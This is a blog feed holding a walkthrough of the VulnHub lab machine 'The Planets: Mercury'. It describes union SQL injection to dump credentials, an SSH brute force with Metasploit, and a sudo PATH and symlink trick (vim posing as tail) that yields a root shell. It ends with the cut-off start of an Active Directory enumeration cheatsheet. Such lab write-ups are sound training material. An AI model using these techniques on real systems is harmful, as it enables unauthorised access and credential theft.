tag:blogger.com,1999:blog-13828796646134709312024-03-21T01:59:05.498-07:00Won't Fix!!!Latish Danawalehttp://www.blogger.com/profile/00084840439148244930noreply@blogger.comBlogger9125tag:blogger.com,1999:blog-1382879664613470931.post-31515825617945919772020-10-04T12:30:00.014-07:002020-10-04T12:54:15.313-07:00THE PLANETS: MERCURY Walkthrough - VulnHub<h1><u style="color: white; font-family: arial; font-size: xx-large;">Introduction</u></h1><p>Getting back to CTF solving after a looong break, is a difficult task. So, I decided to proceed with an EASY challenge, and <span style="font-family: inherit;">VulnHub </span>was the obvious choice to find the one. In few searches, I found a perfect machine to start with - <b>'The Planets: Mercury'</b>.<b> </b>This boot2root machine had 2 flags: USER & ROOT. The USER flag can be obtained by <i><span style="color: #3d85c6;"><b>SQLi </b>==> <b>Creds </b>==> <b>SSH </b>==> <b>FLAG</b></span></i>. The ROOT flag is were an interesting PrivEsc lie in. Hope you find this writeup interesting & useful!</p><div><h1><span style="color: white; font-family: arial; font-size: x-large;"><u>Information Gathering</u></span></h1></div><h4><span style="color: white; font-family: arial; font-size: large;">Port Scan: Nmap</span></h4><p><span style="background-color: white; font-size: 16px;"><span style="font-family: inherit;"></span></span></p><p>To begin with reconnaissance, let's find out open ports with Nmap, with service version enumerations:</p><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjeTrK5EvQD3piOuJ4Q2PzYWr5zBz0f78Sr7a3JBnpAvjEyj4kjuzUf4RIXvu9hbVQzfPYrQUlwMTA1MTCkO_TTzTEeFOGrZhgH9Dm5m0QKU5dSYVb80qKzTEUfBmQW0fbrCouKVMIzAY/s734/portscan.png" style="clear: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="129" data-original-width="734" height="112" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjeTrK5EvQD3piOuJ4Q2PzYWr5zBz0f78Sr7a3JBnpAvjEyj4kjuzUf4RIXvu9hbVQzfPYrQUlwMTA1MTCkO_TTzTEeFOGrZhgH9Dm5m0QKU5dSYVb80qKzTEUfBmQW0fbrCouKVMIzAY/w667-h112/portscan.png" width="667" /></a></p><h4><span style="color: white; font-family: arial; font-size: large;">Port 8080</span></h4><h4><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgplHOmEsXig9x_APUoaBafrGcr4GPpFxtUzxmYUShCSKw4yN2wy8baPe2sGHshrErIHsozVy5YRzexTaQaYkcKaiZ9_GMc9DBpmHrSeEGJiT-6-xHSdJox42eMbcU2V-NIwXDZAQUzDXQ/s1920/webservice.png" style="clear: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="231" data-original-width="1920" height="76" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgplHOmEsXig9x_APUoaBafrGcr4GPpFxtUzxmYUShCSKw4yN2wy8baPe2sGHshrErIHsozVy5YRzexTaQaYkcKaiZ9_GMc9DBpmHrSeEGJiT-6-xHSdJox42eMbcU2V-NIwXDZAQUzDXQ/w664-h76/webservice.png" width="664" /></a></h4><p>So this looks like a simple page with no secrete or hint. Let's try accessing some common directories:</p><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHYZAfLunI7-_yz1BfBFbzvU-L3vo3YMGRdlHP_e84pVRZ6thhvemzqE6R7Wk9bOZVlvck8yNylx9gvbrtNZ6FK0_dQKH9mzIJ_xFXNgPA09cgSzeB0eJquPp4wxug2ijx2VmMovHayeM/s1265/error.png" style="clear: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="428" data-original-width="1265" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHYZAfLunI7-_yz1BfBFbzvU-L3vo3YMGRdlHP_e84pVRZ6thhvemzqE6R7Wk9bOZVlvck8yNylx9gvbrtNZ6FK0_dQKH9mzIJ_xFXNgPA09cgSzeB0eJquPp4wxug2ijx2VmMovHayeM/w668-h216/error.png" width="668" /></a></p><p>Visiting '<i>admin</i>' directory, we got the error page. This happened as the site is built on <b>Django </b>with <i><b><span style="font-family: courier;">Debug </span></b></i>set to <b><span style="font-family: courier;">True</span></b>. Luckily for us, the URL Configuration is being reflected on error page. Let's visit '<i><span style="font-family: courier;">mercuryfacts</span></i>':</p><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7bQyGKOrlKlwVqUaSVeGqPpH50SHk7AX-vz7zGGZR4N3u42bKMdppys40hd85rg88RLs4AS_qfUtOAXWZ0mINNMBZsqDXuoSu2qU6q40dXJsdwucMp5ijyesj-zgewFked_5cIspMQDU/s977/mercuryfacts.png" style="clear: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="642" data-original-width="977" height="421" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7bQyGKOrlKlwVqUaSVeGqPpH50SHk7AX-vz7zGGZR4N3u42bKMdppys40hd85rg88RLs4AS_qfUtOAXWZ0mINNMBZsqDXuoSu2qU6q40dXJsdwucMp5ijyesj-zgewFked_5cIspMQDU/w665-h421/mercuryfacts.png" width="665" /></a></p><p>Again, this page has 2 URLs, <b>To Do List</b> & a <b>Facts page</b>. Facts page has interesting facts about mercury, and more interestingly, these facts are assigned with IDs:</p><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhE1u7eqI1PM-JiImfLJF8DmJYZbxqEmuNGX-QIjOqquJWzn2WAB256Nia5yakFrCfLWgrVjnFbLLpcG5VqBrg-A7kUkklZoFM-ZKOi1S686uFyedKyT63SMBnGdzqkn7xOkovX7vRClWU/s1309/fact-1.png" style="clear: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="279" data-original-width="1309" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhE1u7eqI1PM-JiImfLJF8DmJYZbxqEmuNGX-QIjOqquJWzn2WAB256Nia5yakFrCfLWgrVjnFbLLpcG5VqBrg-A7kUkklZoFM-ZKOi1S686uFyedKyT63SMBnGdzqkn7xOkovX7vRClWU/w664-h136/fact-1.png" width="664" /></a></p><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigVGkDj9Au3Gr44ZoVOi0HR3rT6uXNbRLE0xuw6zOEFpupPNIqiOzFqFvRUIDlXEN7OMXNM0kDZcQeCPdBc8wv7LglvW8yBJzs0LrXIYmDKtDhzoJDM5L1Asg1bZmN7aEbf1vSh-KAdF4/s1415/fact-2.png" style="clear: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="280" data-original-width="1415" height="126" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigVGkDj9Au3Gr44ZoVOi0HR3rT6uXNbRLE0xuw6zOEFpupPNIqiOzFqFvRUIDlXEN7OMXNM0kDZcQeCPdBc8wv7LglvW8yBJzs0LrXIYmDKtDhzoJDM5L1Asg1bZmN7aEbf1vSh-KAdF4/w664-h126/fact-2.png" width="664" /></a></p><p>This is an SQL call. The <b>Fact </b>is changing along with the ID from URL. Let's try to break the query and confirm the SQLi:</p><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQFZ8PljON-dMJyBoexuWl8KN4Pk_XGkiycLvmRsuJHsaeUlc-6MMxn8V10yCyBCOfw3rgfQ_UI6NjaNw4zOG9Ol57M1ppHyxlEV4WAROXPnXCl03HVaTrR2Hal8tTygDYIqOb8A9PwLM/s1920/sql-error.png" style="clear: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="872" data-original-width="1920" height="290" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQFZ8PljON-dMJyBoexuWl8KN4Pk_XGkiycLvmRsuJHsaeUlc-6MMxn8V10yCyBCOfw3rgfQ_UI6NjaNw4zOG9Ol57M1ppHyxlEV4WAROXPnXCl03HVaTrR2Hal8tTygDYIqOb8A9PwLM/w665-h290/sql-error.png" width="665" /></a></p><div>This debug information from the SQL error page, shows that the URL string directly being accepted to build SQL syntax to query the database for facts.</div><div><br />Let's further add the universal <b>True</b> query to this statement to start with:</div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhttnZ2hdwChKaF6vY9DZgqc7hYupJCVW2x-YM0JzbAdlASy4IoAkgWnsrVscPYOTnlJvi028T99rn9XHIaB7TCI12T7_LkXhhyphenhyphenuLZfeJNDF_7DWh2KkpMeIMvRYzC6oqxpR-pT4WGbp7w/s1920/1or1.png" style="clear: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="1920" height="90" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhttnZ2hdwChKaF6vY9DZgqc7hYupJCVW2x-YM0JzbAdlASy4IoAkgWnsrVscPYOTnlJvi028T99rn9XHIaB7TCI12T7_LkXhhyphenhyphenuLZfeJNDF_7DWh2KkpMeIMvRYzC6oqxpR-pT4WGbp7w/w665-h90/1or1.png" width="665" /></a></div><div><br /></div><div>Worked as expected! Considering the True statement, database reverted with all the facts. Now let's exploit this further to dump-out the database.</div><div><br /></div><div><h1><span style="color: white; font-family: arial; font-size: x-large;"><u>Exploitation</u></span></h1></div><div>With '<i><b>order by</b></i>', let's find out no. of records:</div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqKspuOr_L8Xz-itNTfsKEJt3KgMxki6KHQ0wBlqWwf_jQGLxWHc-BZzJB2nXMuR8icRf4h4yPS0q9TV_mfOWhBkPTo4XmHBuM4OJrMgTOTQlapdpcI6eNg1e3aOGBWl8XMbwJrrciK_w/s1102/order+by+1.png" style="clear: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="271" data-original-width="1102" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqKspuOr_L8Xz-itNTfsKEJt3KgMxki6KHQ0wBlqWwf_jQGLxWHc-BZzJB2nXMuR8icRf4h4yPS0q9TV_mfOWhBkPTo4XmHBuM4OJrMgTOTQlapdpcI6eNg1e3aOGBWl8XMbwJrrciK_w/w664-h158/order+by+1.png" width="664" /></a></div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtYskFAUTd5Ot-lfXyXTvU3wQlKW2pBXphjeCnVIADQPvNI-qdPAn_d_lSOB_IuaoJCfbKE8iyPZFtKTHzs13nQJwUJtgfrYkTeDmzHwWthpSSIVi-tHNEpnP6hCTs6X4GPhHrsu0unNs/s1368/order+by+2.png" style="clear: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="403" data-original-width="1368" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtYskFAUTd5Ot-lfXyXTvU3wQlKW2pBXphjeCnVIADQPvNI-qdPAn_d_lSOB_IuaoJCfbKE8iyPZFtKTHzs13nQJwUJtgfrYkTeDmzHwWthpSSIVi-tHNEpnP6hCTs6X4GPhHrsu0unNs/w665-h188/order+by+2.png" width="665" /></a></div><div><br /></div><div><div>As can be seen, it contains only one record as we have got error at 2. Moving ahead with '<b><i>UNION' </i></b>statement, let's find the DB name:</div><div><br /></div></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhellmpfCjSJkpQ8AMXqxmrmFefUnAhZRdPvoMI-9WINH4JE1f6k2IWS6Wf5TlcbPXzAWsKWPNhQeYE_63Gyez8KBitOQNiIGEAK5OkqSCu7c3iCleTASRSnGnkl6pQZC55STxzEmoezKs/s1114/union+select+databasename.png" style="clear: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="190" data-original-width="1114" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhellmpfCjSJkpQ8AMXqxmrmFefUnAhZRdPvoMI-9WINH4JE1f6k2IWS6Wf5TlcbPXzAWsKWPNhQeYE_63Gyez8KBitOQNiIGEAK5OkqSCu7c3iCleTASRSnGnkl6pQZC55STxzEmoezKs/w666-h110/union+select+databasename.png" width="666" /></a></div><div><br /></div><div>Digging deeper and enumerating table names from database, with reference to <b style="font-style: italic;"><span style="font-family: courier;">information_schema</span></b>:</div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVSLyvFZIivFnrA8OAyuy-Wb7Yi310uVURfSurcAOtnyt4N2oOgm5T6MC0Ta-Q7v9yl1blc0MCV6wTWXOrMFjJNpOyrkmKn8mtZ6pZ-IRIA21bVMmV0EgJqsKzuhA_WDYGxaB4Q6mv0Vo/s1736/table+names.png" style="clear: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="264" data-original-width="1736" height="98" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVSLyvFZIivFnrA8OAyuy-Wb7Yi310uVURfSurcAOtnyt4N2oOgm5T6MC0Ta-Q7v9yl1blc0MCV6wTWXOrMFjJNpOyrkmKn8mtZ6pZ-IRIA21bVMmV0EgJqsKzuhA_WDYGxaB4Q6mv0Vo/w666-h98/table+names.png" width="666" /></a></div><div><br /></div><div><b>USERS </b>table seems like interesting, let's enumerate the columns from it:</div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDSAf1cuUp-RxOI7VmFDsmYqROlWbTpFDJjcoNWPWE3S2rLdNh9QySX9vmj8x-Pg5Xu_JN1nVC4PEMOgj1ttJy6lWdOQllOz0ZPBEaGoV0VQFzdFDtYgEBTXNtIs9QoI9dhYRpEIwB2II/s1676/columns+from+users.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="270" data-original-width="1676" height="104" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDSAf1cuUp-RxOI7VmFDsmYqROlWbTpFDJjcoNWPWE3S2rLdNh9QySX9vmj8x-Pg5Xu_JN1nVC4PEMOgj1ttJy6lWdOQllOz0ZPBEaGoV0VQFzdFDtYgEBTXNtIs9QoI9dhYRpEIwB2II/w667-h104/columns+from+users.png" width="667" /></a></div><div><br /></div><div>The obvious choice will be to procced with dumping data from <b><i>username </i></b>& <i style="font-weight: bold;">password</i>:</div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWtsZekBTVM6FvwlkoX-JkmBQJPDFJbjwFnc0MtkHBZ6fcVFoy0xrRuGkYL2m3tqMTLjutoad5_Q0cVLGq4tBIBif8xfSLMG6oi2yfd2wYdxzK0UBNTPw8Tsby45qzxq6QyOHoryUYgVg/s1259/sql+dump+usernames.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="243" data-original-width="1259" height="124" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWtsZekBTVM6FvwlkoX-JkmBQJPDFJbjwFnc0MtkHBZ6fcVFoy0xrRuGkYL2m3tqMTLjutoad5_Q0cVLGq4tBIBif8xfSLMG6oi2yfd2wYdxzK0UBNTPw8Tsby45qzxq6QyOHoryUYgVg/w668-h124/sql+dump+usernames.png" width="668" /></a></div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgj7L8s5uNKd_tojF6_bttfR-2UOmm8vaz4Exds8vOy3XxjgyShARn1aR5EvQDVeMPxglrkIvZjpTpyZdeDhAe7hyphenhyphen72u9U1VAJDcM-jM8MITxrU7yFb4F089tD7OqggKxbtBdc12b1reys/s1701/sql+dump+passwords.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="244" data-original-width="1701" height="92" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgj7L8s5uNKd_tojF6_bttfR-2UOmm8vaz4Exds8vOy3XxjgyShARn1aR5EvQDVeMPxglrkIvZjpTpyZdeDhAe7hyphenhyphen72u9U1VAJDcM-jM8MITxrU7yFb4F089tD7OqggKxbtBdc12b1reys/w666-h92/sql+dump+passwords.png" width="666" /></a></div><div>Remember, there's a SSH service running! We shall use these dumped credentials to login via SSH. Being lazy to try with each username & password combination, MSF auxiliary will be helpful here to bruteforce the SSH login:</div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWF0UjG2ug769UuEbmEvSKEj13gB42a-P1YkzYhB4Jh_sHbGyOYHS7jQqQ0YCsZ2CeB8CudOVXD-ymHgX94TX0Zv9MwqbGEsoi7voxs1pesog5B8DkemYAVOpG2vawaoLrvfRfiHbRROo/s1077/ssh+aux.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="366" data-original-width="1077" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWF0UjG2ug769UuEbmEvSKEj13gB42a-P1YkzYhB4Jh_sHbGyOYHS7jQqQ0YCsZ2CeB8CudOVXD-ymHgX94TX0Zv9MwqbGEsoi7voxs1pesog5B8DkemYAVOpG2vawaoLrvfRfiHbRROo/w668-h218/ssh+aux.png" width="668" /></a></div><div><br /></div><div>Success! We found the valid <b>username:password</b> combination:</div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRb_G8VPFM3UxDXQOrVY0ddXAvywkX8k6h71KKNWBy0vHd7Ce3tOBmzv-6wmFgttH-ptpi4m36q4EKut57lKEdudAi1RCH9t2kZRwK8OqmVajBIiOOqB1NF3PgjJr2V92raVmBGpQmaNo/s1909/msf+bruteforce.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="378" data-original-width="1909" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRb_G8VPFM3UxDXQOrVY0ddXAvywkX8k6h71KKNWBy0vHd7Ce3tOBmzv-6wmFgttH-ptpi4m36q4EKut57lKEdudAi1RCH9t2kZRwK8OqmVajBIiOOqB1NF3PgjJr2V92raVmBGpQmaNo/w665-h152/msf+bruteforce.png" width="665" /></a></div><div><br /></div><div>Moving ahead, let's SSH into <i><b>webmaster </b></i>and gain the <b>user flag</b>:</div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQ6QYLocQnUeWicBMS5FOyul7vGiMiYZwRZsYC1Gkpq72LrE8BX-ryjDUDMd9CzAWWvuNbD6SCyHzOWqwOrzJmvJ4Ul2zcThMaCf2AhE04XXl018O8OBN2R33sA9paxqp0Jy4nhTGTBAA/s857/user+compromised.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="743" data-original-width="857" height="554" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQ6QYLocQnUeWicBMS5FOyul7vGiMiYZwRZsYC1Gkpq72LrE8BX-ryjDUDMd9CzAWWvuNbD6SCyHzOWqwOrzJmvJ4Ul2zcThMaCf2AhE04XXl018O8OBN2R33sA9paxqp0Jy4nhTGTBAA/w663-h554/user+compromised.png" width="663" /></a></div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-sgwVyweYl1FeQaGHU8kCbFlG-PwOOUl1witlI0vEA8LlCZuvkLpjkSXdekpSDCbyRdbUgLJfmEjKoBS8SkdycUDnFp17eU9cyjW1K9PvK-xKckxIr6SPOe8bulOZfV1-NVhjZBcd5Dg/s527/user+flag.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="82" data-original-width="527" height="100" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-sgwVyweYl1FeQaGHU8kCbFlG-PwOOUl1witlI0vEA8LlCZuvkLpjkSXdekpSDCbyRdbUgLJfmEjKoBS8SkdycUDnFp17eU9cyjW1K9PvK-xKckxIr6SPOe8bulOZfV1-NVhjZBcd5Dg/w661-h100/user+flag.png" width="661" /></a></div><div><br /></div><div>Awesome! This was an easy catch. But the very interesting technique lies in Privilege Escalation part, let's move ahead.</div><div><br /></div><div><h1><span style="color: white; font-family: arial; font-size: x-large;"><u>Privilege Escalation</u></span></h1></div><div>Exploring all files & folders leads us to a secrete note:</div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLJIrhh9e_yuGjgpz4Jjb_17dZDUZeDrEq-7jJmtwqshmfsjeQSQqzF7JqUuNJkp_OTzrYSNEuUkt2uA2_e_QmUE9R4Td-46TgEl-upmO3LaDMbHV3WD3RSxhLQDgsZy9y47mSQ_v6ePI/s778/linuxmaster+password.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="276" data-original-width="778" height="228" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLJIrhh9e_yuGjgpz4Jjb_17dZDUZeDrEq-7jJmtwqshmfsjeQSQqzF7JqUuNJkp_OTzrYSNEuUkt2uA2_e_QmUE9R4Td-46TgEl-upmO3LaDMbHV3WD3RSxhLQDgsZy9y47mSQ_v6ePI/w667-h228/linuxmaster+password.png" width="667" /></a></div><div><br /></div><div>By decoding the <b>base64</b> value, we got the password for <b><i>linuxmaster </i></b>user. Let's <b><i><span style="font-family: courier;">su </span></i></b>into it & look for root flag:</div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6rVC04i78n4AIaaoxTcUIWnlYe0Wb789Mrbf1tJ84Psfq5vju0odB_5lZqdnvZA9LqUEE1qJW11wVY6oL0abHr6cLJqvVQq6BRbrXYFMiXRFQ-rMz8h0TAM4etg7QON6D4cPiuR_LBGU/s1047/login+to+linuxmaster.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="293" data-original-width="1047" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6rVC04i78n4AIaaoxTcUIWnlYe0Wb789Mrbf1tJ84Psfq5vju0odB_5lZqdnvZA9LqUEE1qJW11wVY6oL0abHr6cLJqvVQq6BRbrXYFMiXRFQ-rMz8h0TAM4etg7QON6D4cPiuR_LBGU/w665-h180/login+to+linuxmaster.png" width="665" /></a></div><div><br /></div><div>Checking <i>linuxmaster's</i> privileges, we can understand that the user is allowed to run <i style="font-weight: bold;"><span style="font-family: courier;">/usr/bin/check_syslog.sh</span></i> as a root user (sudo permissions), but in Preserved Environment. Now, as a primary approach, let's read and understand the shell script:</div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbGE0QzPcqRQWos0Y0aj25_gZc0b1DaVqSAvOnwxwiKPxCu37JPWiU_SM0PpfEDBuGrxW6SywD0nNBSzuW-Z-LWMZXNOvxVjl19i0E50RcGo7iTudu7H_niNbHknXpJhRrnsNloXgL9V8/s824/cat+checksyslog.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="129" data-original-width="824" height="100" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbGE0QzPcqRQWos0Y0aj25_gZc0b1DaVqSAvOnwxwiKPxCu37JPWiU_SM0PpfEDBuGrxW6SywD0nNBSzuW-Z-LWMZXNOvxVjl19i0E50RcGo7iTudu7H_niNbHknXpJhRrnsNloXgL9V8/w666-h100/cat+checksyslog.png" width="666" /></a></div><div><br /></div><div><div>As can be seen here, the user doesn't have the write permission to modify the shell script. But, as the user can execute it and <b><i><span style="font-family: courier;">tail </span></i></b>command is also being called in the script, we can take advantage of this by linking <i>tail </i>with another executable which can spawn a bash shell!</div><div><br /></div><div>Being a Linux machine, this machine has <b><i><span style="font-family: courier;">vim </span></i></b>like most others. And <i>vim</i> can spawn a shell! Let's symlink <span style="font-family: courier;"><i style="font-weight: bold;">vim</i> </span>through <i style="font-weight: bold;"><span style="font-family: courier;">tail </span></i>and add the current path to environment variables:</div></div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIO-C0a3qtVE3vXGMsDpD03Mw3fPA0uRCIKJoimDhonMnF_miEyUdzSX08Yt48tjnGUHNDPnkY9RrFqfXaQoNrzoIWZk_5v5ACNQz9q7q_AeB6sv2fH2xOpdPzZWFtlMCoQEBIX8ePbVY/s546/symlinking.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="80" data-original-width="546" height="94" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgIO-C0a3qtVE3vXGMsDpD03Mw3fPA0uRCIKJoimDhonMnF_miEyUdzSX08Yt48tjnGUHNDPnkY9RrFqfXaQoNrzoIWZk_5v5ACNQz9q7q_AeB6sv2fH2xOpdPzZWFtlMCoQEBIX8ePbVY/w667-h94/symlinking.png" width="667" /></a></div><div><br /></div><div><div>Now, we should execute <i><span style="font-family: courier;">check_syslog.sh</span></i> in preserved environment mode so that symlinking can work as expected. This will link <i>vim </i>to <i>tail </i>and open the <i><b><span style="font-family: courier;">check_syslog.sh</span></b></i> in <b><i>vim </i>editor</b> mode:</div><div><br /></div></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4OlJnzsE2jxDlALMR7e8AlHhkuCzLoIGRxy3jVVLntoI2przqbfN3G26LG80IdaDm3A1LazkLTVUcYwbYhsogZazkkyhvrrRzSjiM2FBBq7e_qrVBRenm7hjfo2wVdx_wt2vKvqL7ujw/s684/symlink+execution+1.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="78" data-original-width="684" height="72" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi4OlJnzsE2jxDlALMR7e8AlHhkuCzLoIGRxy3jVVLntoI2przqbfN3G26LG80IdaDm3A1LazkLTVUcYwbYhsogZazkkyhvrrRzSjiM2FBBq7e_qrVBRenm7hjfo2wVdx_wt2vKvqL7ujw/w666-h72/symlink+execution+1.png" width="666" /></a></div><div><br /></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTTIXAQf08CFLcX2HFBB9I0VPc-qJSCl5YhNpSg3LnPqilngv3ZT2lF8B6LLILbVNGzGX2qMb6DWyqOC4RoGOfJWfYzQu8duDOiX96_Pci1dxiBLUwyl7BVV5KjtvzjPwk6EfpibRcgJk/s556/vim+editor+mode.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="103" data-original-width="556" height="118" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTTIXAQf08CFLcX2HFBB9I0VPc-qJSCl5YhNpSg3LnPqilngv3ZT2lF8B6LLILbVNGzGX2qMb6DWyqOC4RoGOfJWfYzQu8duDOiX96_Pci1dxiBLUwyl7BVV5KjtvzjPwk6EfpibRcgJk/w664-h118/vim+editor+mode.png" width="664" /></a></div><div><br /></div><div><div>Spawning <b><i><span style="font-family: courier;">/bin/bash</span> </i></b>from <i><span style="font-family: courier;">vim </span></i>will land us into <b>root </b>shell:</div><div><br /></div></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoxV7rApAi9CANphkh6H9pR9vRW1v0yAmgekAxRP3bo3TrwCHelsZWbzLNB56PXWG2j2MVVYZhENzDPacHxkhB8MCDWW-2tXKi63SZaSqUBerEfVq-ayQdmtr7zSiYnzaA9ywSULaPBZg/s950/root+gained.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="362" data-original-width="950" height="244" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgoxV7rApAi9CANphkh6H9pR9vRW1v0yAmgekAxRP3bo3TrwCHelsZWbzLNB56PXWG2j2MVVYZhENzDPacHxkhB8MCDWW-2tXKi63SZaSqUBerEfVq-ayQdmtr7zSiYnzaA9ywSULaPBZg/w665-h244/root+gained.png" width="665" /></a></div><div><br /></div><div><div>Voila! Now, let's move ahead and hunt for root flag:</div><div><br /></div></div><div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTblImqmAeY4DWbhjS16eXjb-ItSOMB1vA7fiwDUwZNgxziefqgH-u5O2rDP5zmqjg9ksuY5wutRqIzOYNQ9SRfXgdLfI2kDzjGobZ2fGIkZ4lzxvALa2es-M34-kMBqnQRqOCjkYRbHM/s688/root+flag.png" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="574" data-original-width="688" height="534" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTblImqmAeY4DWbhjS16eXjb-ItSOMB1vA7fiwDUwZNgxziefqgH-u5O2rDP5zmqjg9ksuY5wutRqIzOYNQ9SRfXgdLfI2kDzjGobZ2fGIkZ4lzxvALa2es-M34-kMBqnQRqOCjkYRbHM/w640-h534/root+flag.png" width="640" /></a></div><div><br /></div><div><div style="text-align: center;"><b><i><span style="font-family: verdana;"><br /></span></i></b></div><div style="text-align: center;"><b><i><span style="font-family: verdana;">Awesome technique always gives awesome result!</span></i></b></div></div><div><br /></div>Akshay Pandurngihttp://www.blogger.com/profile/15995804430587233535noreply@blogger.com1tag:blogger.com,1999:blog-1382879664613470931.post-23596565161356174572020-08-19T23:08:00.000-07:002020-08-19T23:08:52.360-07:00Domain Enumeration Cheatsheet<div><p><span style="font-family: inherit;">In this post, I am going to share a cheatsheet which you can use while doing domain enumeration in active directory environment. Let's begin. <br /></span></p><div><span style="font-family: inherit;">Always Enumerate following things first:</span></div><ol><li><div><span style="font-family: inherit;">Users</span></div></li><li><div><span style="font-family: inherit;">Computers</span></div></li><li><div><span style="font-family: inherit;">Domain Administrators</span></div></li><li><div><span style="font-family: inherit;">Enterprise 